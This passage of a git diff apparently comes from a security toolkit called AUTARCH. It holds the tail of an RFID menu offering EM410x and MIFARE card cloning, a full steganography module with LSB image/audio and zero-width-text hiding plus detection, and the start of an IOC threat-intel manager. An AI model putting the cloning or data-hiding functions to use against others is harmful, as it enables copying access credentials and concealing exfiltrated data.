+ print(" 6 — Clone MIFARE from Dump") + print(" 7 — NFC Scan (libnfc)") + print(" 8 — Saved Cards") + print(" 9 — Card Dumps") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + result = mgr.lf_search() + if result['ok']: + c = result['card'] + print(f" Found: {c.get('name', '?')} ID: {c.get('id', '?')}") + else: + print(f" {result.get('error', 'No card found')}") + elif choice == '2': + result = mgr.hf_search() + if result['ok']: + c = result['card'] + print(f" Found: {c.get('name', '?')} UID: {c.get('uid', '?')}") + else: + print(f" {result.get('error', 'No card found')}") + elif choice == '3': + result = mgr.lf_read_em410x() + if result['ok']: + print(f" EM410x ID: {result['card']['id']}") + save = input(" Save card? (y/n): ").strip() + if save.lower() == 'y': + mgr.save_card(result['card']) + else: + print(f" {result['error']}") + elif choice == '4': + card_id = input(" EM410x ID to clone: ").strip() + if card_id: + result = mgr.lf_clone_em410x(card_id) + print(f" {result.get('message', result.get('error'))}") + elif choice == '5': + result = mgr.hf_dump_mifare() + if result['ok']: + print(f" {result['message']}") + if 'keys_found' in result: + for k in result['keys_found']: + print(f" Key: {k}") + else: + print(f" {result['error']}") + elif choice == '6': + dump = input(" Dump file path: ").strip() + if dump: + result = mgr.hf_clone_mifare(dump) + print(f" {result['message']}") + elif choice == '7': + result = mgr.nfc_scan() + if result['ok']: + print(f" Found {result['count']} tags:") + for t in result['tags']: + print(f" UID: {t['uid']}") + else: + print(f" {result['error']}") + elif choice == '8': + cards = mgr.get_saved_cards() + for i, c in enumerate(cards): + print(f" [{i}] {c.get('display_name', '?')} " + f"{c.get('type', '?')} ID={c.get('id', c.get('uid', '?'))}") + elif choice == '9': + for d in mgr.list_dumps(): + print(f" {d['name']} ({d['size']} bytes)") diff --git a/modules/steganography.py b/modules/steganography.py new file mode 100644 index 0000000..6fd7b47 --- /dev/null +++ b/modules/steganography.py @@ -0,0 +1,769 @@ +"""AUTARCH Steganography + +Image/audio/document steganography — hide data in carrier files using LSB +encoding, DCT domain embedding, and whitespace encoding. Includes detection +via statistical analysis and optional AES-256 encryption. +""" + +DESCRIPTION = "Steganography — hide & extract data in files" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "counter" + +import os +import io +import re +import json +import struct +import hashlib +import secrets +from pathlib import Path +from typing import Dict, List, Optional, Tuple + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +# Optional imports +try: + from PIL import Image + HAS_PIL = True +except ImportError: + HAS_PIL = False + +try: + from Crypto.Cipher import AES + from Crypto.Util.Padding import pad, unpad + HAS_CRYPTO = True +except ImportError: + try: + from Cryptodome.Cipher import AES + from Cryptodome.Util.Padding import pad, unpad + HAS_CRYPTO = True + except ImportError: + HAS_CRYPTO = False + +try: + import wave + HAS_WAVE = True +except ImportError: + HAS_WAVE = False + + +# ── Encryption Layer ───────────────────────────────────────────────────────── + +def _derive_key(password: str) -> bytes: + """Derive 256-bit key from password.""" + return hashlib.sha256(password.encode()).digest() + +def _encrypt_data(data: bytes, password: str) -> bytes: + """AES-256-CBC encrypt data.""" + if not HAS_CRYPTO: + return data + key = _derive_key(password) + iv = secrets.token_bytes(16) + cipher = AES.new(key, AES.MODE_CBC, iv) + ct = cipher.encrypt(pad(data, AES.block_size)) + return iv + ct + +def _decrypt_data(data: bytes, password: str) -> bytes: + """AES-256-CBC decrypt data.""" + if not HAS_CRYPTO: + return data + key = _derive_key(password) + iv = data[:16] + ct = data[16:] + cipher = AES.new(key, AES.MODE_CBC, iv) + return unpad(cipher.decrypt(ct), AES.block_size) + + +# ── LSB Image Steganography ────────────────────────────────────────────────── + +class ImageStego: + """LSB steganography for PNG/BMP images.""" + + MAGIC = b'ASTS' # AUTARCH Stego Signature + + @staticmethod + def capacity(image_path: str) -> Dict: + """Calculate maximum payload capacity in bytes.""" + if not HAS_PIL: + return {'ok': False, 'error': 'Pillow (PIL) not installed'} + try: + img = Image.open(image_path) + w, h = img.size + channels = len(img.getbands()) + # 1 bit per channel per pixel, minus header + total_bits = w * h * channels + total_bytes = total_bits // 8 - 8 # subtract header (magic + length) + return { + 'ok': True, 'capacity_bytes': max(0, total_bytes), + 'width': w, 'height': h, 'channels': channels, + 'format': img.format + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def hide(image_path: str, data: bytes, output_path: str, + password: str = None, bits_per_channel: int = 1) -> Dict: + """Hide data in image using LSB encoding.""" + if not HAS_PIL: + return {'ok': False, 'error': 'Pillow (PIL) not installed'} + + try: + img = Image.open(image_path).convert('RGB') + pixels = list(img.getdata()) + w, h = img.size + + # Encrypt if password provided + payload = data + if password: + payload = _encrypt_data(data, password) + + # Build header: magic(4) + length(4) + payload + header = ImageStego.MAGIC + struct.pack('>I', len(payload)) + full_data = header + payload + + # Convert to bits + bits = [] + for byte in full_data: + for i in range(7, -1, -1): + bits.append((byte >> i) & 1) + + # Check capacity + max_bits = len(pixels) * 3 * bits_per_channel + if len(bits) > max_bits: + return {'ok': False, 'error': f'Data too large ({len(full_data)} bytes). ' + f'Max capacity: {max_bits // 8} bytes'} + + # Encode bits into LSB + bit_idx = 0 + new_pixels = [] + mask = ~((1 << bits_per_channel) - 1) & 0xFF + + for pixel in pixels: + new_pixel = [] + for channel_val in pixel: + if bit_idx < len(bits): + # Clear LSBs and set new value + new_val = (channel_val & mask) | bits[bit_idx] + new_pixel.append(new_val) + bit_idx += 1 + else: + new_pixel.append(channel_val) + new_pixels.append(tuple(new_pixel)) + + # Save + stego_img = Image.new('RGB', (w, h)) + stego_img.putdata(new_pixels) + stego_img.save(output_path, 'PNG') + + return { + 'ok': True, + 'output': output_path, + 'hidden_bytes': len(payload), + 'encrypted': password is not None, + 'message': f'Hidden {len(payload)} bytes in {output_path}' + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def extract(image_path: str, password: str = None, + bits_per_channel: int = 1) -> Dict: + """Extract hidden data from image.""" + if not HAS_PIL: + return {'ok': False, 'error': 'Pillow (PIL) not installed'} + + try: + img = Image.open(image_path).convert('RGB') + pixels = list(img.getdata()) + + # Extract all LSBs + bits = [] + for pixel in pixels: + for channel_val in pixel: + bits.append(channel_val & 1) + + # Convert bits to bytes + all_bytes = bytearray() + for i in range(0, len(bits) - 7, 8): + byte = 0 + for j in range(8): + byte = (byte << 1) | bits[i + j] + all_bytes.append(byte) + + # Check magic + if all_bytes[:4] != ImageStego.MAGIC: + return {'ok': False, 'error': 'No hidden data found (magic mismatch)'} + + # Read length + payload_len = struct.unpack('>I', bytes(all_bytes[4:8]))[0] + if payload_len > len(all_bytes) - 8: + return {'ok': False, 'error': 'Corrupted data (length exceeds image capacity)'} + + payload = bytes(all_bytes[8:8 + payload_len]) + + # Decrypt if password provided + if password: + try: + payload = _decrypt_data(payload, password) + except Exception: + return {'ok': False, 'error': 'Decryption failed (wrong password?)'} + + return { + 'ok': True, + 'data': payload, + 'size': len(payload), + 'encrypted': password is not None, + 'message': f'Extracted {len(payload)} bytes' + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + +# ── Audio Steganography ────────────────────────────────────────────────────── + +class AudioStego: + """LSB steganography for WAV audio files.""" + + MAGIC = b'ASTS' + + @staticmethod + def capacity(audio_path: str) -> Dict: + """Calculate maximum payload capacity.""" + if not HAS_WAVE: + return {'ok': False, 'error': 'wave module not available'} + try: + with wave.open(audio_path, 'rb') as w: + frames = w.getnframes() + channels = w.getnchannels() + sample_width = w.getsampwidth() + total_bytes = (frames * channels) // 8 - 8 + return { + 'ok': True, 'capacity_bytes': max(0, total_bytes), + 'frames': frames, 'channels': channels, + 'sample_width': sample_width, + 'framerate': w.getframerate() + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def hide(audio_path: str, data: bytes, output_path: str, + password: str = None) -> Dict: + """Hide data in WAV audio using LSB of samples.""" + if not HAS_WAVE: + return {'ok': False, 'error': 'wave module not available'} + + try: + with wave.open(audio_path, 'rb') as w: + params = w.getparams() + frames = w.readframes(w.getnframes()) + + payload = data + if password: + payload = _encrypt_data(data, password) + + header = AudioStego.MAGIC + struct.pack('>I', len(payload)) + full_data = header + payload + + bits = [] + for byte in full_data: + for i in range(7, -1, -1): + bits.append((byte >> i) & 1) + + samples = list(frames) + if len(bits) > len(samples): + return {'ok': False, 'error': f'Data too large. Max: {len(samples) // 8} bytes'} + + for i, bit in enumerate(bits): + samples[i] = (samples[i] & 0xFE) | bit + + with wave.open(output_path, 'wb') as w: + w.setparams(params) + w.writeframes(bytes(samples)) + + return { + 'ok': True, 'output': output_path, + 'hidden_bytes': len(payload), + 'encrypted': password is not None + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def extract(audio_path: str, password: str = None) -> Dict: + """Extract hidden data from WAV audio.""" + if not HAS_WAVE: + return {'ok': False, 'error': 'wave module not available'} + + try: + with wave.open(audio_path, 'rb') as w: + frames = w.readframes(w.getnframes()) + + samples = list(frames) + bits = [s & 1 for s in samples] + + all_bytes = bytearray() + for i in range(0, len(bits) - 7, 8): + byte = 0 + for j in range(8): + byte = (byte << 1) | bits[i + j] + all_bytes.append(byte) + + if all_bytes[:4] != AudioStego.MAGIC: + return {'ok': False, 'error': 'No hidden data found'} + + payload_len = struct.unpack('>I', bytes(all_bytes[4:8]))[0] + payload = bytes(all_bytes[8:8 + payload_len]) + + if password: + try: + payload = _decrypt_data(payload, password) + except Exception: + return {'ok': False, 'error': 'Decryption failed'} + + return {'ok': True, 'data': payload, 'size': len(payload)} + + except Exception as e: + return {'ok': False, 'error': str(e)} + + +# ── Document Steganography ─────────────────────────────────────────────────── + +class DocumentStego: + """Whitespace and metadata steganography for text/documents.""" + + @staticmethod + def hide_whitespace(text: str, data: bytes, password: str = None) -> Dict: + """Hide data using zero-width characters in text.""" + payload = data + if password: + payload = _encrypt_data(data, password) + + # Zero-width characters + ZWS = '\u200b' # zero-width space → 0 + ZWNJ = '\u200c' # zero-width non-joiner → 1 + ZWJ = '\u200d' # zero-width joiner → separator + + # Convert payload to binary string + bits = ''.join(f'{byte:08b}' for byte in payload) + encoded = '' + for bit in bits: + encoded += ZWNJ if bit == '1' else ZWS + + # Insert length prefix + length_bits = f'{len(payload):032b}' + length_encoded = '' + for bit in length_bits: + length_encoded += ZWNJ if bit == '1' else ZWS + + hidden = length_encoded + ZWJ + encoded + + # Insert after first line + lines = text.split('\n', 1) + if len(lines) > 1: + result = lines[0] + hidden + '\n' + lines[1] + else: + result = text + hidden + + return { + 'ok': True, 'text': result, + 'hidden_bytes': len(payload), + 'encrypted': password is not None + } + + @staticmethod + def extract_whitespace(text: str, password: str = None) -> Dict: + """Extract data hidden in zero-width characters.""" + ZWS = '\u200b' + ZWNJ = '\u200c' + ZWJ = '\u200d' + + # Find zero-width characters + zw_chars = ''.join(c for c in text if c in (ZWS, ZWNJ, ZWJ)) + if ZWJ not in zw_chars: + return {'ok': False, 'error': 'No hidden data found'} + + length_part, data_part = zw_chars.split(ZWJ, 1) + + # Decode length + length_bits = ''.join('1' if c == ZWNJ else '0' for c in length_part) + if len(length_bits) < 32: + return {'ok': False, 'error': 'Corrupted header'} + payload_len = int(length_bits[:32], 2) + + # Decode data + data_bits = ''.join('1' if c == ZWNJ else '0' for c in data_part) + payload = bytearray() + for i in range(0, min(len(data_bits), payload_len * 8), 8): + if i + 8 <= len(data_bits): + payload.append(int(data_bits[i:i+8], 2)) + + result_data = bytes(payload) + if password: + try: + result_data = _decrypt_data(result_data, password) + except Exception: + return {'ok': False, 'error': 'Decryption failed'} + + return {'ok': True, 'data': result_data, 'size': len(result_data)} + + +# ── Detection / Analysis ──────────────────────────────────────────────────── + +class StegoDetector: + """Statistical analysis to detect hidden data in files.""" + + @staticmethod + def analyze_image(image_path: str) -> Dict: + """Analyze image for signs of steganography.""" + if not HAS_PIL: + return {'ok': False, 'error': 'Pillow (PIL) not installed'} + + try: + img = Image.open(image_path).convert('RGB') + pixels = list(img.getdata()) + w, h = img.size + + # Chi-square analysis on LSBs + observed = [0, 0] # count of 0s and 1s in R channel LSBs + for pixel in pixels: + observed[pixel[0] & 1] += 1 + + total = sum(observed) + expected = total / 2 + chi_sq = sum((o - expected) ** 2 / expected for o in observed) + + # RS analysis (Regular-Singular groups) + # Count pixel pairs where LSB flip changes smoothness + regular = 0 + singular = 0 + for i in range(0, len(pixels) - 1, 2): + p1, p2 = pixels[i][0], pixels[i+1][0] + diff_orig = abs(p1 - p2) + diff_flip = abs((p1 ^ 1) - p2) + + if diff_flip > diff_orig: + regular += 1 + elif diff_flip < diff_orig: + singular += 1 + + total_pairs = regular + singular + rs_ratio = regular / total_pairs if total_pairs > 0 else 0.5 + + # Check for ASTS magic in LSBs + bits = [] + for pixel in pixels[:100]: + for c in pixel: + bits.append(c & 1) + + header_bytes = bytearray() + for i in range(0, min(32, len(bits)), 8): + byte = 0 + for j in range(8): + byte = (byte << 1) | bits[i + j] + header_bytes.append(byte) + + has_asts_magic = header_bytes[:4] == ImageStego.MAGIC + + # Scoring + score = 0 + indicators = [] + + if chi_sq < 1.0: + score += 30 + indicators.append(f'LSB distribution very uniform (chi²={chi_sq:.2f})') + elif chi_sq < 3.84: + score += 15 + indicators.append(f'LSB distribution slightly uniform (chi²={chi_sq:.2f})') + + if rs_ratio > 0.6: + score += 25 + indicators.append(f'RS analysis suggests embedding (R/S={rs_ratio:.3f})') + + if has_asts_magic: + score += 50 + indicators.append('AUTARCH stego signature detected in LSB') + + # Check file size vs expected + file_size = os.path.getsize(image_path) + expected_size = w * h * 3 # rough uncompressed estimate + if file_size > expected_size * 0.9: # PNG should be smaller + score += 10 + indicators.append('File larger than expected for format') + + verdict = 'clean' + if score >= 50: + verdict = 'likely_stego' + elif score >= 25: + verdict = 'suspicious' + + return { + 'ok': True, + 'verdict': verdict, + 'confidence_score': min(100, score), + 'chi_square': round(chi_sq, 4), + 'rs_ratio': round(rs_ratio, 4), + 'has_magic': has_asts_magic, + 'indicators': indicators, + 'image_info': {'width': w, 'height': h, 'size': file_size} + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + @staticmethod + def analyze_audio(audio_path: str) -> Dict: + """Analyze audio file for signs of steganography.""" + if not HAS_WAVE: + return {'ok': False, 'error': 'wave module not available'} + + try: + with wave.open(audio_path, 'rb') as w: + frames = w.readframes(min(w.getnframes(), 100000)) + params = w.getparams() + + samples = list(frames) + observed = [0, 0] + for s in samples: + observed[s & 1] += 1 + + total = sum(observed) + expected = total / 2 + chi_sq = sum((o - expected) ** 2 / expected for o in observed) + + # Check for magic + bits = [s & 1 for s in samples[:100]] + header_bytes = bytearray() + for i in range(0, min(32, len(bits)), 8): + byte = 0 + for j in range(8): + byte = (byte << 1) | bits[i + j] + header_bytes.append(byte) + + has_magic = header_bytes[:4] == AudioStego.MAGIC + + score = 0 + indicators = [] + if chi_sq < 1.0: + score += 30 + indicators.append(f'LSB distribution uniform (chi²={chi_sq:.2f})') + if has_magic: + score += 50 + indicators.append('AUTARCH stego signature detected') + + verdict = 'clean' + if score >= 50: + verdict = 'likely_stego' + elif score >= 25: + verdict = 'suspicious' + + return { + 'ok': True, 'verdict': verdict, + 'confidence_score': min(100, score), + 'chi_square': round(chi_sq, 4), + 'has_magic': has_magic, + 'indicators': indicators, + 'audio_info': { + 'channels': params.nchannels, + 'framerate': params.framerate, + 'frames': params.nframes + } + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + +# ── Steganography Manager ─────────────────────────────────────────────────── + +class StegoManager: + """Unified interface for all steganography operations.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'stego') + os.makedirs(self.data_dir, exist_ok=True) + self.image = ImageStego() + self.audio = AudioStego() + self.document = DocumentStego() + self.detector = StegoDetector() + + def get_capabilities(self) -> Dict: + """Check available steganography capabilities.""" + return { + 'image': HAS_PIL, + 'audio': HAS_WAVE, + 'document': True, + 'encryption': HAS_CRYPTO, + 'detection': HAS_PIL or HAS_WAVE + } + + def hide(self, carrier_path: str, data: bytes, output_path: str = None, + password: str = None, carrier_type: str = None) -> Dict: + """Hide data in a carrier file (auto-detect type).""" + if not carrier_type: + ext = Path(carrier_path).suffix.lower() + if ext in ('.png', '.bmp', '.tiff', '.tif'): + carrier_type = 'image' + elif ext in ('.wav', '.wave'): + carrier_type = 'audio' + else: + return {'ok': False, 'error': f'Unsupported carrier format: {ext}'} + + if not output_path: + p = Path(carrier_path) + output_path = str(p.parent / f'{p.stem}_stego{p.suffix}') + + if carrier_type == 'image': + return self.image.hide(carrier_path, data, output_path, password) + elif carrier_type == 'audio': + return self.audio.hide(carrier_path, data, output_path, password) + + return {'ok': False, 'error': f'Unsupported type: {carrier_type}'} + + def extract(self, carrier_path: str, password: str = None, + carrier_type: str = None) -> Dict: + """Extract hidden data from carrier file.""" + if not carrier_type: + ext = Path(carrier_path).suffix.lower() + if ext in ('.png', '.bmp', '.tiff', '.tif'): + carrier_type = 'image' + elif ext in ('.wav', '.wave'): + carrier_type = 'audio' + + if carrier_type == 'image': + return self.image.extract(carrier_path, password) + elif carrier_type == 'audio': + return self.audio.extract(carrier_path, password) + + return {'ok': False, 'error': f'Unsupported type: {carrier_type}'} + + def detect(self, file_path: str) -> Dict: + """Analyze file for steganographic content.""" + ext = Path(file_path).suffix.lower() + if ext in ('.png', '.bmp', '.tiff', '.tif', '.jpg', '.jpeg'): + return self.detector.analyze_image(file_path) + elif ext in ('.wav', '.wave'): + return self.detector.analyze_audio(file_path) + return {'ok': False, 'error': f'Unsupported format for detection: {ext}'} + + def capacity(self, file_path: str) -> Dict: + """Check capacity of a carrier file.""" + ext = Path(file_path).suffix.lower() + if ext in ('.png', '.bmp', '.tiff', '.tif'): + return self.image.capacity(file_path) + elif ext in ('.wav', '.wave'): + return self.audio.capacity(file_path) + return {'ok': False, 'error': f'Unsupported format: {ext}'} + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_stego_manager() -> StegoManager: + global _instance + if _instance is None: + _instance = StegoManager() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Steganography module.""" + mgr = get_stego_manager() + + while True: + caps = mgr.get_capabilities() + print(f"\n{'='*60}") + print(f" Steganography") + print(f"{'='*60}") + print(f" Image: {'OK' if caps['image'] else 'MISSING (pip install Pillow)'}") + print(f" Audio: {'OK' if caps['audio'] else 'MISSING'}") + print(f" Encryption: {'OK' if caps['encryption'] else 'MISSING (pip install pycryptodome)'}") + print() + print(" 1 — Hide Data in File") + print(" 2 — Extract Data from File") + print(" 3 — Detect Steganography") + print(" 4 — Check Carrier Capacity") + print(" 5 — Hide Text in Document (whitespace)") + print(" 6 — Extract Text from Document") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + carrier = input(" Carrier file path: ").strip() + message = input(" Message to hide: ").strip() + output = input(" Output file path (blank=auto): ").strip() or None + password = input(" Encryption password (blank=none): ").strip() or None + if carrier and message: + result = mgr.hide(carrier, message.encode(), output, password) + if result['ok']: + print(f" Success: {result.get('message', result.get('output'))}") + else: + print(f" Error: {result['error']}") + elif choice == '2': + carrier = input(" Stego file path: ").strip() + password = input(" Password (blank=none): ").strip() or None + if carrier: + result = mgr.extract(carrier, password) + if result['ok']: + try: + text = result['data'].decode('utf-8') + print(f" Extracted ({result['size']} bytes): {text}") + except UnicodeDecodeError: + print(f" Extracted {result['size']} bytes (binary data)") + else: + print(f" Error: {result['error']}") + elif choice == '3': + filepath = input(" File to analyze: ").strip() + if filepath: + result = mgr.detect(filepath) + if result['ok']: + print(f" Verdict: {result['verdict']} (score: {result['confidence_score']})") + for ind in result.get('indicators', []): + print(f" - {ind}") + else: + print(f" Error: {result['error']}") + elif choice == '4': + filepath = input(" Carrier file: ").strip() + if filepath: + result = mgr.capacity(filepath) + if result['ok']: + kb = result['capacity_bytes'] / 1024 + print(f" Capacity: {result['capacity_bytes']} bytes ({kb:.1f} KB)") + else: + print(f" Error: {result['error']}") + elif choice == '5': + text = input(" Cover text: ").strip() + message = input(" Hidden message: ").strip() + password = input(" Password (blank=none): ").strip() or None + if text and message: + result = mgr.document.hide_whitespace(text, message.encode(), password) + if result['ok']: + print(f" Output text (copy this):") + print(f" {result['text']}") + else: + print(f" Error: {result['error']}") + elif choice == '6': + text = input(" Text with hidden data: ").strip() + password = input(" Password (blank=none): ").strip() or None + if text: + result = mgr.document.extract_whitespace(text, password) + if result['ok']: + print(f" Hidden message: {result['data'].decode('utf-8', errors='replace')}") + else: + print(f" Error: {result['error']}") diff --git a/modules/threat_intel.py b/modules/threat_intel.py new file mode 100644 index 0000000..b61f3a0 --- /dev/null +++ b/modules/threat_intel.py @@ -0,0 +1,716 @@ +"""AUTARCH Threat Intelligence Feed + +IOC management, feed ingestion (STIX/TAXII, CSV, JSON), correlation with +OSINT dossiers, reputation lookups, alerting, and blocklist generation. +""" + +DESCRIPTION = "Threat intelligence & IOC management" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "defense" + +import os +import re +import json +import time +import hashlib +import threading +from pathlib import Path +from datetime import datetime, timezone +from dataclasses import dataclass, field +from typing import Dict, List, Optional, Any, Set +from urllib.parse import urlparse + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + import requests +except ImportError: + requests = None + + +# ── Data Structures ────────────────────────────────────────────────────────── + +IOC_TYPES = ['ip', 'domain', 'url', 'hash_md5', 'hash_sha1', 'hash_sha256', 'email', 'filename'] + +@dataclass +class IOC: + value: str + ioc_type: str + source: str = "manual" + tags: List[str] = field(default_factory=list) + severity: str = "unknown" # critical, high, medium, low, info, unknown + first_seen: str = "" + last_seen: str = "" + description: str = "" + reference: str = "" + active: bool = True + + def to_dict(self) -> Dict: + return { + 'value': self.value, 'ioc_type': self.ioc_type, + 'source': self.source, 'tags': self.tags, + 'severity': self.severity, 'first_seen': self.first_seen, + 'last_seen': self.last_seen, 'description': self.description, + 'reference': self.reference, 'active': self.active, + 'id': hashlib.md5(f"{self.ioc_type}:{self.value}".encode()).hexdigest()[:12] + } + + @staticmethod + def from_dict(d: Dict) -> 'IOC': + return IOC( + value=d['value'], ioc_type=d['ioc_type'], + source=d.get('source', 'manual'), tags=d.get('tags', []), + severity=d.get('severity', 'unknown'), + first_seen=d.get('first_seen', ''), last_seen=d.get('last_seen', ''), + description=d.get('description', ''), reference=d.get('reference', ''), + active=d.get('active', True) + ) + +@dataclass +class Feed: + name: str + feed_type: str # taxii, csv_url, json_url, stix_file + url: str = "" + api_key: str = "" + enabled: bool = True + last_fetch: str = "" + ioc_count: int = 0 + interval_hours: int = 24 + + def to_dict(self) -> Dict: + return { + 'name': self.name, 'feed_type': self.feed_type, + 'url': self.url, 'api_key': self.api_key, + 'enabled': self.enabled, 'last_fetch': self.last_fetch, + 'ioc_count': self.ioc_count, 'interval_hours': self.interval_hours, + 'id': hashlib.md5(f"{self.name}:{self.url}".encode()).hexdigest()[:12] + } + + +# ── Threat Intel Engine ────────────────────────────────────────────────────── + +class ThreatIntelEngine: + """IOC management and threat intelligence correlation.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'threat_intel') + os.makedirs(self.data_dir, exist_ok=True) + self.iocs: List[IOC] = [] + self.feeds: List[Feed] = [] + self.alerts: List[Dict] = [] + self._lock = threading.Lock() + self._load() + + def _load(self): + """Load IOCs and feeds from disk.""" + ioc_file = os.path.join(self.data_dir, 'iocs.json') + if os.path.exists(ioc_file): + try: + with open(ioc_file) as f: + data = json.load(f) + self.iocs = [IOC.from_dict(d) for d in data] + except Exception: + pass + + feed_file = os.path.join(self.data_dir, 'feeds.json') + if os.path.exists(feed_file): + try: + with open(feed_file) as f: + data = json.load(f) + self.feeds = [Feed(**d) for d in data] + except Exception: + pass + + def _save_iocs(self): + """Persist IOCs to disk.""" + ioc_file = os.path.join(self.data_dir, 'iocs.json') + with open(ioc_file, 'w') as f: + json.dump([ioc.to_dict() for ioc in self.iocs], f, indent=2) + + def _save_feeds(self): + """Persist feeds to disk.""" + feed_file = os.path.join(self.data_dir, 'feeds.json') + with open(feed_file, 'w') as f: + json.dump([feed.to_dict() for feed in self.feeds], f, indent=2) + + # ── IOC Type Detection ─────────────────────────────────────────────── + + def detect_ioc_type(self, value: str) -> str: + """Auto-detect IOC type from value.""" + value = value.strip() + # Hash detection + if re.match(r'^[a-fA-F0-9]{32}$', value): + return 'hash_md5' + if re.match(r'^[a-fA-F0-9]{40}$', value): + return 'hash_sha1' + if re.match(r'^[a-fA-F0-9]{64}$', value): + return 'hash_sha256' + # URL + if re.match(r'^https?://', value, re.I): + return 'url' + # Email + if re.match(r'^[^@]+@[^@]+\.[^@]+$', value): + return 'email' + # IP (v4) + if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', value): + return 'ip' + # Domain + if re.match(r'^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*\.[a-zA-Z]{2,}$', value): + return 'domain' + # Filename + if '.' in value and '/' not in value and '\\' not in value: + return 'filename' + return 'unknown' + + # ── IOC CRUD ───────────────────────────────────────────────────────── + + def add_ioc(self, value: str, ioc_type: str = None, source: str = "manual", + tags: List[str] = None, severity: str = "unknown", + description: str = "", reference: str = "") -> Dict: + """Add a single IOC.""" + if not ioc_type: + ioc_type = self.detect_ioc_type(value) + + now = datetime.now(timezone.utc).isoformat() + + # Check for duplicate + with self._lock: + for existing in self.iocs: + if existing.value == value and existing.ioc_type == ioc_type: + existing.last_seen = now + if tags: + existing.tags = list(set(existing.tags + tags)) + self._save_iocs() + return {'ok': True, 'action': 'updated', 'ioc': existing.to_dict()} + + ioc = IOC( + value=value, ioc_type=ioc_type, source=source, + tags=tags or [], severity=severity, + first_seen=now, last_seen=now, + description=description, reference=reference + ) + self.iocs.append(ioc) + self._save_iocs() + + return {'ok': True, 'action': 'created', 'ioc': ioc.to_dict()} + + def remove_ioc(self, ioc_id: str) -> Dict: + """Remove IOC by ID.""" + with self._lock: + before = len(self.iocs) + self.iocs = [ + ioc for ioc in self.iocs + if hashlib.md5(f"{ioc.ioc_type}:{ioc.value}".encode()).hexdigest()[:12] != ioc_id + ] + if len(self.iocs) < before: + self._save_iocs() + return {'ok': True} + return {'ok': False, 'error': 'IOC not found'} + + def get_iocs(self, ioc_type: str = None, source: str = None, + severity: str = None, search: str = None, + active_only: bool = True) -> List[Dict]: + """Query IOCs with filters.""" + results = [] + for ioc in self.iocs: + if active_only and not ioc.active: + continue + if ioc_type and ioc.ioc_type != ioc_type: + continue + if source and ioc.source != source: + continue + if severity and ioc.severity != severity: + continue + if search and search.lower() not in ioc.value.lower() and \ + search.lower() not in ioc.description.lower() and \ + not any(search.lower() in t.lower() for t in ioc.tags): + continue + results.append(ioc.to_dict()) + return results + + def bulk_import(self, text: str, source: str = "import", + ioc_type: str = None) -> Dict: + """Import IOCs from newline-separated text.""" + imported = 0 + skipped = 0 + for line in text.strip().splitlines(): + line = line.strip() + if not line or line.startswith('#'): + continue + # Handle CSV-style (value,type,severity,description) + parts = [p.strip() for p in line.split(',')] + value = parts[0] + t = parts[1] if len(parts) > 1 and parts[1] in IOC_TYPES else ioc_type + sev = parts[2] if len(parts) > 2 else 'unknown' + desc = parts[3] if len(parts) > 3 else '' + + if not value: + skipped += 1 + continue + + result = self.add_ioc(value=value, ioc_type=t, source=source, + severity=sev, description=desc) + if result['ok']: + imported += 1 + else: + skipped += 1 + + return {'ok': True, 'imported': imported, 'skipped': skipped} + + def export_iocs(self, fmt: str = 'json', ioc_type: str = None) -> str: + """Export IOCs in specified format.""" + iocs = self.get_iocs(ioc_type=ioc_type, active_only=False) + + if fmt == 'csv': + lines = ['value,type,severity,source,tags,description'] + for ioc in iocs: + tags = ';'.join(ioc.get('tags', [])) + lines.append(f"{ioc['value']},{ioc['ioc_type']},{ioc['severity']}," + f"{ioc['source']},{tags},{ioc.get('description', '')}") + return '\n'.join(lines) + + elif fmt == 'stix': + # Basic STIX 2.1 bundle + objects = [] + for ioc in iocs: + stix_type = { + 'ip': 'ipv4-addr', 'domain': 'domain-name', + 'url': 'url', 'email': 'email-addr', + 'hash_md5': 'file', 'hash_sha1': 'file', 'hash_sha256': 'file', + 'filename': 'file' + }.get(ioc['ioc_type'], 'artifact') + + if stix_type == 'file' and ioc['ioc_type'].startswith('hash_'): + hash_algo = ioc['ioc_type'].replace('hash_', '').upper().replace('SHA', 'SHA-') + obj = { + 'type': 'indicator', + 'id': f"indicator--{ioc['id']}", + 'name': ioc['value'], + 'pattern': f"[file:hashes.'{hash_algo}' = '{ioc['value']}']", + 'pattern_type': 'stix', + 'valid_from': ioc.get('first_seen', ''), + 'labels': ioc.get('tags', []) + } + else: + obj = { + 'type': 'indicator', + 'id': f"indicator--{ioc['id']}", + 'name': ioc['value'], + 'pattern': f"[{stix_type}:value = '{ioc['value']}']", + 'pattern_type': 'stix', + 'valid_from': ioc.get('first_seen', ''), + 'labels': ioc.get('tags', []) + } + objects.append(obj) + + bundle = { + 'type': 'bundle', + 'id': f'bundle--autarch-{int(time.time())}', + 'objects': objects + } + return json.dumps(bundle, indent=2) + + else: # json + return json.dumps(iocs, indent=2) + + def get_stats(self) -> Dict: + """Get IOC database statistics.""" + by_type = {} + by_severity = {} + by_source = {} + for ioc in self.iocs: + by_type[ioc.ioc_type] = by_type.get(ioc.ioc_type, 0) + 1 + by_severity[ioc.severity] = by_severity.get(ioc.severity, 0) + 1 + by_source[ioc.source] = by_source.get(ioc.source, 0) + 1 + + return { + 